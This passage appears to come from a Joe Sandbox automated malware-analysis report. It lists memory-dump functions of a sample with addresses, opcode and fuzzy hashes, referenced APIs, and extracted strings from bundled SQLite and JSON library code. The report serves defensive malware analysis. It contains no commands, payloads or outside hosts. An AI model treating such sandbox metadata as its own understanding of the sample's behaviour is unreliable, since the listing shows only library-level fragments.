Source File: 00000000.00000002.3909505303.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true

Associated: 00000000.00000002.3909409252.0000000000270000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3909505303.00000000003A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913542109.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000633000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.000000000066F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000686000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3921929524.0000000000687000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3923852313.0000000000843000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3923905340.0000000000844000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3923961184.0000000000847000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3924038380.0000000000848000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_270000_Lisect_AVT_24003_G1A_37.jbxd

Yara matches

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: ca1757b03ae904cc734866c98af0ad37c83c338b5ce7752794f6403a6eccf655
Instruction ID: e5a4ad08b515c46b4e3a904d8b21b24dafb06ce78cf82a181150627fff6bfef2
Opcode Fuzzy Hash: ca1757b03ae904cc734866c98af0ad37c83c338b5ce7752794f6403a6eccf655
Instruction Fuzzy Hash: AF010432610144AFCF068F59CC45C9E7B2AEF86331B250208EC119B2A1EBB1ED418B90

Function 0034CD02 Relevance: 1.6, APIs: 1, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 00271FDE

Memory Dump Source

Source File: 00000000.00000002.3909505303.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true

Associated: 00000000.00000002.3909409252.0000000000270000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3909505303.00000000003A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913542109.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000633000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.000000000066F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000686000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3921929524.0000000000687000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3923852313.0000000000843000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3923905340.0000000000844000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3923961184.0000000000847000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3924038380.0000000000848000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_270000_Lisect_AVT_24003_G1A_37.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy
String ID:
API String ID: 2659868963-0
Opcode ID: bf9ae28ec7126f94913a97ccfb1cc161a9fbfce2373d2d27c45b81acac976781
Instruction ID: bae2c6259248d9b8c4e314ce61b7d7fc28630eaf699b51371ac914c0630b48da
Opcode Fuzzy Hash: bf9ae28ec7126f94913a97ccfb1cc161a9fbfce2373d2d27c45b81acac976781
Instruction Fuzzy Hash: 0E01DB7581030D67C716AFA9EC018897BECDF02364B508635F9189E951FB70F56487D1

Function 00363E63 Relevance: 1.5, APIs: 1, Instructions: 40memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,0034B16C,?,?,003637E9,00000001,00000364,?,00000006,000000FF,?,0034E0EB,?,?,?,?), ref: 00363EA5

Memory Dump Source

Source File: 00000000.00000002.3909505303.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true

Associated: 00000000.00000002.3909409252.0000000000270000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3909505303.00000000003A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913542109.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000633000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.000000000066F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000686000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3921929524.0000000000687000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3923852313.0000000000843000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3923905340.0000000000844000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3923961184.0000000000847000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3924038380.0000000000848000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_270000_Lisect_AVT_24003_G1A_37.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 501876242131078ae54ae27f0c3e772e3ac6f383621d84cb5566920cbce1f582
Instruction ID: 9cf508669484aed9aedab143ad64e34bee23b5fea34188a404ac7a11de553ab2
Opcode Fuzzy Hash: 501876242131078ae54ae27f0c3e772e3ac6f383621d84cb5566920cbce1f582
Instruction Fuzzy Hash: E6F0E933A01525669B336B718A05F5B775DDF41361F16C111BC099A088CB71EE0482F0

Function 0036489D Relevance: 1.5, APIs: 1, Instructions: 33memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,?,?,0034E0EB,?,?,?,?,?,00272D8D,0034B16C,?,?,0034B16C), ref: 003648D0

Memory Dump Source

Source File: 00000000.00000002.3909505303.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true

Associated: 00000000.00000002.3909409252.0000000000270000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3909505303.00000000003A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913542109.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000633000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.000000000066F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000686000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3921929524.0000000000687000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3923852313.0000000000843000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3923905340.0000000000844000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3923961184.0000000000847000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3924038380.0000000000848000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_270000_Lisect_AVT_24003_G1A_37.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: b4dac2b70884013b9d081ee234dd82b9b9e5d982e5a2cdfb6c863d640954ea35
Instruction ID: 5d4b73bde628fec0b95a211fa61b662ed0e8efdf11b69f857b2791f602cbf47e
Opcode Fuzzy Hash: b4dac2b70884013b9d081ee234dd82b9b9e5d982e5a2cdfb6c863d640954ea35
Instruction Fuzzy Hash: B2E092369026A15AE62337758C05FAB778DCF833B1F178631AC14BB498DB62DC0092E2

Function 04E90186 Relevance: .1, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3930926346.0000000004E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e90000_Lisect_AVT_24003_G1A_37.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3993a47d10a0a2a6647415d47030e6d76fdb37dad1dab2f3905e8db0bd4193c2
Instruction ID: ad464931f1a2cd203aa2a02f8fd1a81d2b117e94c8a0b0bec90246b879b6e5b2
Opcode Fuzzy Hash: 3993a47d10a0a2a6647415d47030e6d76fdb37dad1dab2f3905e8db0bd4193c2
Instruction Fuzzy Hash: 2221D6AB24C210BEEA4685853B58AF67BEDF3C7330370546BF443C6543E2951E8A7171

Function 04E90256 Relevance: .1, Instructions: 127COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3930926346.0000000004E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e90000_Lisect_AVT_24003_G1A_37.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb76871b59a9942f46fc48e0f5e4c69fc8c51cf2c018c7d8f8bbe18b0bbb88f8
Instruction ID: 2f1fade6657163d4c0909d65add22bfc9ff3f0b9eb4de29940d80a15b70a022c
Opcode Fuzzy Hash: fb76871b59a9942f46fc48e0f5e4c69fc8c51cf2c018c7d8f8bbe18b0bbb88f8
Instruction Fuzzy Hash: CA21C8AB24C124BEE54684912B549FB7BAEF6C33303709467F843D6583E2C55E4971B1

Function 04E90232 Relevance: .1, Instructions: 109COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3930926346.0000000004E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e90000_Lisect_AVT_24003_G1A_37.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f92b0c3ce4efa7be008a6618f3bc7e4a902fd524ca9d27d2fa5d4d7a1826217
Instruction ID: 4414005d826b01d330b7513505014635554530182a7d65743d242d18db58e07d
Opcode Fuzzy Hash: 6f92b0c3ce4efa7be008a6618f3bc7e4a902fd524ca9d27d2fa5d4d7a1826217
Instruction Fuzzy Hash: 012137AB24C224EFDA4198812A54AF77BEDF3867307B06127F803CB582E2955E4562B1

Function 04E9024E Relevance: .1, Instructions: 107COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3930926346.0000000004E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e90000_Lisect_AVT_24003_G1A_37.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1e25ab1d4012b699f2b420cec6dc444bfc59f5a3f7b2aca0a5db1c81dd3dc517
Instruction ID: 5b921d1e26669a2fcdc73b39591b85f546ac56164c2b9aa79dbe310991a6857c
Opcode Fuzzy Hash: 1e25ab1d4012b699f2b420cec6dc444bfc59f5a3f7b2aca0a5db1c81dd3dc517
Instruction Fuzzy Hash: 221182EB24C124BEF44284812B549FB6BAEF2C37703B09426F803D6542F2C55E4D3071

Function 04E902A2 Relevance: .1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3930926346.0000000004E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e90000_Lisect_AVT_24003_G1A_37.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f48703373404af8757ad38a36d9ae93c9acf1615a5f6693be38bfc119e17873
Instruction ID: 551a74e598bc231d6e4480419e5aa2ee63eaf0b7c0ab3af167e92420877ba3b3
Opcode Fuzzy Hash: 8f48703373404af8757ad38a36d9ae93c9acf1615a5f6693be38bfc119e17873
Instruction Fuzzy Hash: 01018EBB64C215BFE98284C12B549FA7BAEF3C33303B09426F843D6542E2942E497571

Function 04E902EF Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3930926346.0000000004E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e90000_Lisect_AVT_24003_G1A_37.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 319548b546907973ecca9835641c21479aa310e3891461bb6e93c0bb3d0509e7
Instruction ID: 2d4d37256d36267d15637e1eb4d32430551298e0827c91e6bd5461dc0535369e
Opcode Fuzzy Hash: 319548b546907973ecca9835641c21479aa310e3891461bb6e93c0bb3d0509e7
Instruction Fuzzy Hash: D8F090BB20C115FFE901C1916F64AFB67AEE3C57307B09816F847C6582E2982E4A7171

Function 04E9030A Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3930926346.0000000004E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e90000_Lisect_AVT_24003_G1A_37.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b4a717d3343fa21de869c8bb6c960ee5e9d9113fee5b723d49fbedc1d67a5ea
Instruction ID: 96dfd6e794aea9c84a5352b1bf50220de7a6c47dd6b1af86823e0417e318a2c2
Opcode Fuzzy Hash: 2b4a717d3343fa21de869c8bb6c960ee5e9d9113fee5b723d49fbedc1d67a5ea
Instruction Fuzzy Hash: 07F089B720C610EFE640C6516A69AFBBBEDF7D13307B1981BF443D5441D3582949B131

Function 04E90395 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3930926346.0000000004E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e90000_Lisect_AVT_24003_G1A_37.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 59174fd7687cf2ec1470a9a8da2795ab51f1e655355fb82d3e78bd38514abe0e
Instruction ID: 96c1205b26e600e49fdd02ec9caabab56939e16269f6ae4e01784891cf6440ff
Opcode Fuzzy Hash: 59174fd7687cf2ec1470a9a8da2795ab51f1e655355fb82d3e78bd38514abe0e
Instruction Fuzzy Hash: 1FF02BF711C110AFFA02C5A13A509FB3BECE7C13213619847F4C6C5442D20D1E4AA132

Function 04E9035D Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3930926346.0000000004E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e90000_Lisect_AVT_24003_G1A_37.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 750b9b5f9a5074194eb14773ec899bbd34b7376b84c50ae5a85ec68a96f8807e
Instruction ID: 779d0866736e5c30fe3bea30056673eb5b0aeafdcf7aec2fb291ccfd0e1bfcb2
Opcode Fuzzy Hash: 750b9b5f9a5074194eb14773ec899bbd34b7376b84c50ae5a85ec68a96f8807e
Instruction Fuzzy Hash: DAD09E7760C121EEE541C5923B187F957E9A6D07313B19953F443C5485E2595A4E7031

Function 04E9037A Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3930926346.0000000004E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e90000_Lisect_AVT_24003_G1A_37.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f04df1963f8c57d762e262f1a5ab63e1a44cd952d252d10cf597aa7da0bb8e2
Instruction ID: e53ff70fa749c6836bd75ff932acb0d0a5ab491b0373025ab1d38c55e286715a
Opcode Fuzzy Hash: 8f04df1963f8c57d762e262f1a5ab63e1a44cd952d252d10cf597aa7da0bb8e2
Instruction Fuzzy Hash: FFC08C6671C108DBCA44AAF1616C3F93BE567A03163D038C2F0C2CB4C1E626A985F224

Non-executed Functions

Function 002FBBB0 Relevance: 18.5, APIs: 3, Strings: 7, Instructions: 970COMMON

Download Yara Rule

Strings

+, xrefs: 002FC260
, xrefs: 002FC475, 002FC49E, 002FC4F2, 002FC517
+Inf, xrefs: 002FC416
-Inf, xrefs: 002FC40F
Inf, xrefs: 002FC41F
NaN, xrefs: 002FC319
gfff, xrefs: 002FC7BD

Memory Dump Source

Source File: 00000000.00000002.3909505303.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true

Associated: 00000000.00000002.3909409252.0000000000270000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3909505303.00000000003A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913542109.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000633000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.000000000066F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000686000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3921929524.0000000000687000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3923852313.0000000000843000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3923905340.0000000000844000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3923961184.0000000000847000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3924038380.0000000000848000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_270000_Lisect_AVT_24003_G1A_37.jbxd

Yara matches

Similarity

API ID:
String ID: $+$+Inf$-Inf$Inf$NaN$gfff
API String ID: 0-2577472133
Opcode ID: 23749b871eda626637cab7ec5f9dda37d9129d418b5a810438560765c1fe59f1
Instruction ID: 41457a4fca3fddd78664a03ba5532f06e3d3adce09bceb63e4f8f86b46daaa5c
Opcode Fuzzy Hash: 23749b871eda626637cab7ec5f9dda37d9129d418b5a810438560765c1fe59f1
Instruction Fuzzy Hash: 2F8200309187898FD726CF28C55036BFBE5AFCA384F248A6EE9C997251D730C955CB42

Function 0028A100 Relevance: 11.0, Strings: 7, Instructions: 2299COMMON

Download Yara Rule

Strings

t;:, xrefs: 0028A286
type must be boolean, but is , xrefs: 0028C171, 0028C1A2, 0028C265
L<:, xrefs: 0028A496
L<:, xrefs: 0028A4E8
%s|%s, xrefs: 0028A347
131, xrefs: 0028A32B, 0028A33B
50500, xrefs: 0028A2A5

Memory Dump Source

Source File: 00000000.00000002.3909505303.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true

Associated: 00000000.00000002.3909409252.0000000000270000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3909505303.00000000003A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913542109.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000633000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.000000000066F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000686000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3921929524.0000000000687000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3923852313.0000000000843000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3923905340.0000000000844000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3923961184.0000000000847000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3924038380.0000000000848000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_270000_Lisect_AVT_24003_G1A_37.jbxd

Yara matches

Similarity

API ID:
String ID: %s|%s$131$50500$L<:$L<:$t;:$type must be boolean, but is
API String ID: 0-1359761539
Opcode ID: 4b37570f8a8d8498407da4739c21f90a723a735ed2e97f1895088d710971bfe6
Instruction ID: 0856fc4c6a3a9c1525d8fde1a5712bcad96d6e60d63d195c7af98ed187320ff3
Opcode Fuzzy Hash: 4b37570f8a8d8498407da4739c21f90a723a735ed2e97f1895088d710971bfe6
Instruction Fuzzy Hash: 23231174C112598FEB25EF68C958BEDBBB0AF05300F1481DDE409AB292DB749E94CF91

Function 0034A800 Relevance: 9.2, Strings: 7, Instructions: 490COMMON

Download Yara Rule

Strings

no such vfs: %s, xrefs: 0034AA11
BINARY, xrefs: 0034AA32, 0034AA41, 0034AA5B, 0034AA9D
NOCASE, xrefs: 0034AAB4
RTRIM, xrefs: 0034AA75
MATCH, xrefs: 0034ABCB, 0034ABD9, 0034ABF9, 0034ABFA, 0034AC10
sqlite_rename_table, xrefs: 0034ABA7
automatic extension loading failed: %s, xrefs: 0034AD13

Memory Dump Source

Source File: 00000000.00000002.3909505303.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true

Associated: 00000000.00000002.3909409252.0000000000270000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3909505303.00000000003A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913542109.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000633000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.000000000066F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000686000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3921929524.0000000000687000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3923852313.0000000000843000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3923905340.0000000000844000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3923961184.0000000000847000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3924038380.0000000000848000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_270000_Lisect_AVT_24003_G1A_37.jbxd

Yara matches

Similarity

API ID:
String ID: BINARY$MATCH$NOCASE$RTRIM$automatic extension loading failed: %s$no such vfs: %s$sqlite_rename_table
API String ID: 0-1885142750
Opcode ID: 3c6846208a2e45137454d99539b85a8ce9d9636daa8598fbb4c1408d98f24059
Instruction ID: f1fed9cfd4124b7410733a01a56653a1023b07106b135493c2fedb75a92c873f
Opcode Fuzzy Hash: 3c6846208a2e45137454d99539b85a8ce9d9636daa8598fbb4c1408d98f24059
Instruction Fuzzy Hash: EB0226B0A40B009BEB238F14DC86B6B77E9EF41704F15442CE54A9F691D7B5FA85CB82

Function 002E06F0 Relevance: 5.3, Strings: 4, Instructions: 282COMMON

Download Yara Rule

Strings

/Kim, xrefs: 002E0919
type must be number, but is , xrefs: 002E08B1
/Kim, xrefs: 002E0932
type must be string, but is , xrefs: 002E0754

Memory Dump Source

Source File: 00000000.00000002.3909505303.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true

Associated: 00000000.00000002.3909409252.0000000000270000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3909505303.00000000003A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913542109.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000633000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.000000000066F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000686000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3921929524.0000000000687000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3923852313.0000000000843000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3923905340.0000000000844000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3923961184.0000000000847000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3924038380.0000000000848000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_270000_Lisect_AVT_24003_G1A_37.jbxd

Yara matches

Similarity

API ID:
String ID: /Kim$/Kim$type must be number, but is $type must be string, but is
API String ID: 0-1144537432
Opcode ID: c2ded5a75a824bd5a3f9094e312a49a9c9b2d7ee0237536082978c8b09c97b13
Instruction ID: 43655db73c6fa406913fce534438f1c9e59f49a746fbc5721151694a87b0688f
Opcode Fuzzy Hash: c2ded5a75a824bd5a3f9094e312a49a9c9b2d7ee0237536082978c8b09c97b13
Instruction Fuzzy Hash: 41913671E002099FCB08CFADD88179DB7A9EB88310F54826EE819D7392D7755D46CB90

Function 002842A0 Relevance: 5.2, APIs: 3, Instructions: 671COMMON

Download Yara Rule

APIs

__Mtx_unlock.LIBCPMT ref: 0028489B
__Mtx_unlock.LIBCPMT ref: 002849A1
__Mtx_unlock.LIBCPMT ref: 00284A6C

Memory Dump Source

Source File: 00000000.00000002.3909505303.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true

Associated: 00000000.00000002.3909409252.0000000000270000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3909505303.00000000003A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913542109.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000633000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.000000000066F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000686000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3921929524.0000000000687000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3923852313.0000000000843000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3923905340.0000000000844000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3923961184.0000000000847000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3924038380.0000000000848000.00000080.00000001.01000000.00000003.sdmpDownload File

